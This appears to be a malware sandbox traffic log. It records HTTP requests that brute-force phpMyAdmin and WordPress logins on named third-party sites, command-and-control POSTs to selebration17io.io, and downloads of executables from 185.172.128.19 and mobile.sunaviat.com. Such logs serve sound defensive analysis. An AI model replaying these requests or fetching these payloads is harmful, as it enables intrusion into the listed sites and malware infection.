Source: global traffic	HTTP traffic detected: POST /phpmyadmin/index.php?route=/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=8p850ha38al79pkuskhqkgapjl; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/phpmyadmin/Content-Length: 148Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /phpMyAdmin/index.php?route=/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=a70qfc3g0vu9p754f85kck34n3; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/phpMyAdmin/Content-Length: 147Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 161Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=mruul8ldluhskqv1trt26ro4ujUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fksv-schwimmen.de%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ksv-schwimmen.de/wp-login.php
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 138Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cabinet-orsika.fr/wp-login.phpContent-Length: 150Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/wp-login.phpContent-Length: 158Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=1jcqg67re2d1lpt5kl3hrj1r8hUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 136Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /phpmyadmin/index.php?route=/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=j26t0os1ij0b028ku3l4hk3shb; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/phpmyadmin/Content-Length: 162Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 146Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 144Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cabinet-orsika.fr/wp-login.phpContent-Length: 170Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/wp-login.phpContent-Length: 134Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /phpMyAdmin/index.php?route=/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=ija2a2tqnubgbv7hafhlghd0t3; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/phpMyAdmin/Content-Length: 150Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 152Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /pma HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 147Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=2ppcq4e78r9u2d410k2iavqo3nUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /phpmyadmin/index.php?route=/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=v9qkgod3ikn4df2eqtt58f8s6s; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/phpmyadmin/Content-Length: 174Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=q2ph1u7ied1kb5jksttv46bm67User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ycrspbudlggeh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gkquxeqtjibfvjb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mhyiegtwnorxyotd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pjuubfblumh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rvouyohteiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xtbtebpjsdy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gopppbkiwem.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jtugjfrfqapxb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://baokbborkvku.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fdgqmqgpcgc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vkncupesrku.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tsiipnavugkna.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wusnhtlhryhnw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bbosssakuvwvojr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: selebration17io.io
Source: global traffic	HTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.172.128.19
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dnkbvhpuagi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mvrsrytepcatxa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: selebration17io.io
Source: global traffic	HTTP traffic detected: GET /check/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trmpc.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://otwbgkjqkrfghp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://durkecnnuygoy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: selebration17io.io
Source: global traffic	HTTP traffic detected: GET /data/pdf/may.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mobile.sunaviat.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vyvhosbrmkdox.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://orqebfbtqbuler.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sgqveupilmve.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://csiwevuwwlicsvth.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: sjyey.com
